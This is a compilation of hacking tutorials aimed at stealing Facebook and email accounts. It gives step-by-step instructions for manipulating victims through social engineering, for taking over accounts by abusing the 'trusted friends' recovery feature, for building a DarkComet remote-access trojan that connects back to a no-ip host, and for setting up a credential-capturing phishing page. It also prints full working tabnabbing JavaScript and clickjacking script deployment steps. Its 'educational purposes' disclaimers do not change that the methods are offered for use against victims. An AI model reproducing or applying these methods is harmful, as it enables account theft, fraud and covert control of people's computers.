Social Engineering

I myself have had a few people in the past ask me questions on social engineering. I always say to anyone, you need to imagine social engineering as a game. But before i talk about the 'Game', I want to go into detail about Basic knowledge and self preparation.

Basic knowledge and self preparation:
It's important like most things in life to be fully equipped and prepared to take on a task. I myself would suggest you have clear outlines of what your trying to achieve, be it to get someone's email password, exploiting them for money, to get into a online game group/clan etc etc. In this case the email and password of Facebook account.

First of all, you need to take into consideration of what you will need, for this social engineering tutorial i'm going to outline this from an obtaining someone's email password perspective. Before i continue, i would like to stress some important factors you might want to take into consideration:

1) People are more open to you if they perceive you as an idiot.
2) People are less suspicious of you when you make them laugh.
3) People are more trusting if you actually take an interest in them.

I'm going to break these three points down to give you a better understanding of why this is:

In the case of 1 - nearly everyone seems to be more careless when they perceive you as an idiot, the main reason for that is, you don't consider someone who appears to be an idiot as a threat. Another reason is that people tend to become more open and arrogant when they feel they are on a higher pedistel than you (never forget that!). Now there are things you need to remember however, although these things are true if you overplay your idiot persona it will not be good in your fortune. Always remember real morons are annoying as hell, you DO NOT want to put off the person your trying to social engineer(unless your trying to fail, then knock yourself out).

In the case of 2 - when talking to someone it's easy to see why this rule is advised. Often it's a good ice breaker, also reinforcing the idea that "your a nice guy", it slowly allows the person to build a relationship of 'trust' with you.

in the case of 3 - also an obvious advisement, if you just pester someone for information without at-least pretending to take an interest in what they are saying, not only will you come across as rude, it will make the person wonder why your probing them for person info.

With these three points made, i will now continue with my example of obtaining someone's Facebook Email and password. Before you go into detail, it's important to outline what you need to successfully social engineer the password out of someone. Now you could try to Social engineer them for their password, I advise you be a bit more intelligent and indirectly social engineer them for their password by obtaining their password recovery knowledge. Now it's important to what you need to successfully hack their account through recovery questions. You will need the following:

Their email address
Their account password

With this in mind it's imperative you plan how you will obtain these details. I will tell you how i do it. But first i need you to understand, this whole transaction will not be completed over a course of a day, it can take days to weeks depending on the person. I suggest you talk to them and read them first. If their open, then you can do it within days, if their not then it would be better you spread this out over a week or two. I also want you to imagine what you will say, try to predict their answers and MOST OF ALL, think of a scapegoat on why your probing them for these answers, just in case your less than suttle and arouse suspicion, if they ever suspect you it will go from a flame to a fire it's important to stamp all of their doubt in you as soon as possible.

Now there are many ways you can obtain their password and addressee. Some people and post their address on their profiles. In which case this is easy pickings, however that is rare. So you need to devise a way of obtaining that info. Now you can pretend that you are from bank or something like this and ask for their email address. Or you can pretend that you are some student an doing some research. Be creative

Now i need the answer to their security question, now you need to find out what the question is, i suggest pretend to recover password to see what it is or get the info for all of the recovery questions email asks. Im going to go with the first option and say for example their recovery question was : What is your dogs name?.

How I would go about obtaining this would be to pretend to have a pet of my own, i would start off the convo like so:

me: Ffs my dog wont stop barking, seriously where did i leave my ducktape lol!
victim: lol yeah i know sometimes my dog's the same, annoying -.-
me: Oh you have a dog? i didn't realize whats your dogs name, if you don't mind me asking.

It is important to add "if you don't mind me asking", because it gives the person a bit of power over you and also show's a little respect (once again reinforcing the notion your a nice fellow).

POINT: I wouldn't dive straight into "whats your dogs name" start with the breed first and remember try to predict what they will inturn ask (mines blah blah whats yours?).

With that in mind, I'm sure by now you can see how easy it is, to social engineer someone's password through the indirect method of password recovery. Now obviously most recovery questions wont be about pets mostly they're "mothers maiden name" "place of birth" etc. But use the same logic and work around it, remember think every detail through and ask yourself this if someone gave you this story or asked you in a  certain way would it seem legit to you?
and when you have the email address, click on Facebook, I forgot password and will be sent on your email.

The Game:

The game is basically, perfecting "self preparation". Social engineering is a game,. If you think about it in this way: each time trust is given to you, you advance a level, which each level you advance, your ability of obtaining information from this person becomes easier. In a sense mastering the ability to come up with more ingenious ways of manipulating someone, without arousing suspicion, is what separates the lucky noobs from the elites.

When thinking about this as a game, you need to reflect on your goals. As I've mentioned before try to imagine the dialogue between you both, think about how you will obtain certain things and more importantly have clear directives. With this in mind i think we can now talk about how you might want to consider presenting yourself (only applies if the person is indeed a stranger).

So if you were going to go after a complete stranger, you should first try and get as much research on them as you can. For example, age, name. This is important for making up for fake identity. I would also suggest if you social engineer more than one person you write down, in detail! your differn't alias so you don't get confused. Nothing would be worse than using the wrong alias on the wrong person.

When building your identity decide on what would give you the biggest advantage with this person. This can be from faking your age to match the interests of this person, thus giving you the advantage of being able to "click" with the person. Pretending to be a student or in a dead end job for sympathy manipulation or in the case of a dead end job, pretending to relate to the slave. There are many things you can do, as I've mentioned it depends on the circumstances you need.

Social Engineering The Art of Human Hacking ?

Download Link - Click Me

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

Using 3 Fake Friends Method ?

Hack Facebook Account" is most popular term is the in Web, Previously I posted many articles on "Hack Facebook Accounts" with Keyloggers, phishing, etc but that Hacking Of Facebook Account methods are not working fine now a days. So Hackers have to go smarter and we have found a new security hole (its just a trick) in the FB. So we can Hack Facebook easily. Now we can hack Facebook online with the help of new password recovery feature of FB. So keep on reading about this new way for Hacking Of Facebook Account. FB recently released new way to Recover Account Password using "Three Trusted Friends" . If we forgot the Facebook account password then FB will send unique security code to three friends. Then we have to ask that security code to each three friend. And after giving that codes to FB we can recover the Facebook password. We can use this feature to Hack Facebook Account Free So here we are going to misuse this new feature of FB to Hack Facebook Account. We have to just create 3 fake Fb accounts and then have to send the friend request from those 3 fake accounts to the victim. Victim must accept those friend request. Now we can use this above "Three Trusted Friend" feature to reset the victims' Facebook account password. I have given a full guide on How To Hack Facebook Accounts. 

Note - The 3 fake account must be 7 day older, otherwise this Facebook Hack will not work So lets start on our tutorial on Hack Facebook Account.

1. Go to Facebook.com and click on Forgot Password.

2. Now give the victim's Facebook account email or if give the FB username or Profile name and click on search. And then you will get the victims profile account. Just click on "This is my Account". 

3. Then click on "No longer have access to this". 

4. Now you will be asked to enter new email address, just enter your own new email address. 

5. Now Facebook will ask you to give security question's answer. Not to worry, just enter wrong answer thrice and you will be taken to the new page. 

6. Here is the main part of Hacking Of Facebook Account. Click on Continue and FB will ask you to select 3 Trusted Friends. Their will be a full friend's list of the victim which also includes your previously created "Three Fake Facebook Account" . Just select that three accounts and then Facebook will send security codes to our fake accounts. Now collect those security codes and enter it. Then Facebook will send"Password Recovery Email" at the email address we entered in 4th step. Thus you can easily reset the password of victim's account. 

No we have successfully done with Hack Facebook Accounts 

Note : We have received the problems like they don't get the new page in

step 5. So this depends on the victim's activity on Facebook account. 

So friends, I hope you enjoyed this article on Hack Facebook Accounts and if you have any problem with this Hack Facebook Account Free then please do comment.

Remote Administration Tools

A remote administration tool (or RAT) is a program that allows certain persons to connect to and manage remote computers in the Internet or across a local network. A remote administration tool is based on the server and client technology. The server part runs on a controlled computer and receives commands from the client, which is installed on other remote host. A remote administration tool works in background and hides from the user. The person who controls it can monitor user’s activity, manage files, install additional software, control the entire system including any present application or hardware device, modify essential system settings, turn off or restart a computer.

Video

• Go on http://www.no-ip.com/, Create your Account and click on "Download".
• Now Click on "Windows
• Now Click on "Download 3.0.4"
• Now you must install No-DUP 3.0, Click on "Next"
• Now, choose "Install Location" and click on "Next"
• Now choose "Start Menu Folder" and Click on "Install"
• Setup was completed successfully, click on "Close"
• Now, go on http://www.no-ip.com/ and click on "Login" then type your Email and your Password.
• Now, click on "Add a Host"
• Choose a "Hostname", enter your IP address and click on "Create Host".
•  Done, Now open No-IP DUC 3.0 and enter your email and your password and click on "OK"
• Now, Select your "HOST" and click on "Save".
• Done, you can close No-IP DUC 3.0
• Download DarkComet v4.0 here and run DarkComet. 
• Click on [+], Choose your port (I advice 1604) and click on "Listen".
• Now click on "Settings".
• Click on "Mo-IP Updater" and type your No-IP informations.
• Now you will edit your server, click on "Edit Server" and click on "Network Settings", enter your informations and click on "Test network".
• Click on "Module Startup" and choose your settings.
• Click on "Install Message" and choose your fake message.
• Now click on "Module Shield" and choose your settings.
• Now click on "Build Module" and click on "Build Server".
• See the Results
  
  

  Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

  
  

Phishing

Phishing - is an e-mail fraud method in which the perpetrator sends out legitimate-looking email in an attempt to gather personal and financial information from recipients. Typically, the messages appear to come from well known and trustworthy Web sites. Web sites that are frequently spoofed by phishers include PayPal, eBay, MSN, Yahoo, BestBuy, and America Online. A phishing expedition, like the fishing expedition it's named for, is a speculative venture: the phisher puts the lure hoping to fool at least a few of the prey that encounter the bait.


1. First a fall you need a fake login page for facebook (fake.html),and a Php script to redirect and capture the victims passwords (login.php)
2. Download Here - Click Me

Password - @hackaholic

After you download the files, Open login.php,with a note pad and search for the term www.enteryoursite.com and replace it with the site address where you want the victim to be redirected ,finally save it.

Note : This a very important step redirect the victim to a proper site other wise the victim will get suspicious .In our case we are making fake face booklogin page so its better to redirect the victim to www.facebook.com/careers

4. Now create an account at Free web hosting site like 110mb.com , T35.com or ripway.com


5. Now upload both the files (fake.html , login.php ) to your hosting account and send the fake.html(fake facbook login page) link to your victim

            Example:- www.yoursite.110 mb.com/fake.html

6. Now when the victim enters all his credentials, like login name and password in our fake login page and when he clicks login He will be redirected to site which we did in step 3 


7. Now to see the victims id ,password, login to your hosting account "110mb.com " where you will see a new file "log.txt" .Open it to see the victims user id and the password

Note:- If your still confused, you can watch my video on Hack a Facebook Account Using a Fake login Page 

This is a simple but a very effective method to Hack face book accounts .If you have any doubts please feel free to comment !!

Video

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

Tabnabbing ?

Hey friends,It's Chris Defaulter Valentine.An Microsoft Certified Systems Engineer (MCSE),Internet Marketer IIT hacker I Have 10 Years' Experience Circumventing Information Security Measures And Can Report That I've Successfully Compromised All Systems That I Targeted For Unauthorized Access Except One. I Have Two Years' Experience As a Private Investigator, And My Responsibilities Included Finding People And Their Money, Primarily Using Social Engineering Techniques. today i am going to How to Hack emails, social networking websites and other websites involving login information. The technique that i am going to teach you today is Advanced Tabnabbing. I have already explained what is basic tabnabbing today we will extend our knowledge base, i will explain things with practical example. So lets learn..


1. A hacker say(me Chris) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details) 

2. I sends a copy of this web page to victim whose account or whatever i want to hack. 

3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script. 

4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages. 

5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one. 

6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him. 

Here end's the attack scenario for advanced tabnabbing. 

Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing. 

Follow below measure to protect yourself from Tabnabbing: 

1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc. 

2. If you notice any suspicious things happening, then first of all verify the URL in the address bar. 

3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's. 

4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks. 

5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious. 

That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff.. 

Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.

First sample code for doing tabnabbing with the help of iframes: 

 <!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: Chris Defaulter Valentine ( Anonymous )

-->

<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>

<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";

//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
 BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;

//Set FAVICON
if(REAL_FAVICON){
 var link = document.createElement('link');
 link.type = 'image/x-icon';
 link.rel = 'shortcut icon';
 link.href = REAL_FAVICON;
 document.getElementsByTagName('head')[0].appendChild(link);
}

//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);

//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();

//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
 el_tabnab.onblur = function(){
 TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
 }
 el_tabnab.onfocus= function(){
 if(TIMER) clearTimeout(TIMER);
 }
} else {
 setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}

function TabNabIt(){
 if(SWITCHED == "false"){
 //Redirect the iframe to FAKE_PAGE_URL
 el_tabnab.src=FAKE_PAGE_URL;
 //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
 if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

 //Change the favicon -- This doesn't seem to work in IE
 if(BROWSER_TYPE != "Internet Explorer"){
 var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
 for (var i=0; i<links.length; i++) {
 var looplink = links[i];
 if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
 document.getElementsByTagName("head")[0].removeChild(looplink);
 }
 }
 var link = document.createElement("link");
 link.type = "image/x-icon";
 link.rel = "shortcut icon";
 link.href = FAKE_FAVICON;
 document.getElementsByTagName("head")[0].appendChild(link);
 }
 }
}
</script>

</body>
</html>

Now what you need to replace in this code to make it working say for Facebook:

1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any freeweb hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

Clickjacking

What is Clickjacking?

Clickjacking is a technique used by hackers or spammers to trick or cheat the users into clicking on links or buttons that are hidden from normal view (usually links color is same as page background). Clickjacking is possible because of a security weakness in web browsers that allows web pages to be layered and hidden from general view. In this situation what happens is that You think that you are clicking on a standard button or link, like the PLAY button or download button on an video or some stuff, but you are really clicking on a hidden link. Since you can’t see the clickjacker’s hidden link, you have no idea what you’re really doing. You could be downloading malware or making all your Facebook information public without realizing it. Some good hackers make ajax keyloggers and put them as javascripts over their fake websites and when you open them they retrieve all your passwords stored in web browser and records whatever you type while the web browser is open and stores this information on their servers.

There are several types of clickjacking but the most common is to hide a LIKE button under a dummy or fake button. This technique is called Likejacking. A scammer or hacker might trick you by saying that you like a product you’ve never heard. At first glance, likejacking sounds more annoying than harmful, but that’s not always true. If you’re scammed for liking Mark Zukenberg​, the world isn’t likely to end. But you may be helping to spread spam or possibly sending Friends somewhere that contains malware.

 How It Work ?

The like button is made hidden and it moves along with the mouse.So, wherever the user clicks, the like button is clicked and your fan page is liked.First download the JavaScript from the below download link.

Mediafire

After downloading the script extract all the files.Now modify the config.js and follow the below instructions.

1. Modify config.js file in "src" folder to change fan page URL and other things.
Comments are provided beside them to help you what they do exactly.

2. There is a time out function after which the like button will not be present(move) anymore. 
"time" if set to 0 will make it stay forever(which is usually not preferred).

3. Set opacity to '0' before you run the script. Otherwise the like button will not be invisible

Properly set the var in the file if it is jumbled ?

 After modifying the config.js script upload these scripts to javascript hosting website.I prefer yourjavascript you can also upload to some other website. 

How To Run The Script ?

1. Add config.js just above head tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/config.js"> </script>
----------------------------------------------------------------------------------------------------------------

2. Add like.js after body tag in your pages
----------------------------------------------------------------------------------------------------------------
<script language="javascript" src="src/like.js"> </script>
----------------------------------------------------------------------------------------------------------------

Remove src link with your uploaded link.

5. That's it. The script is ready to go.
Video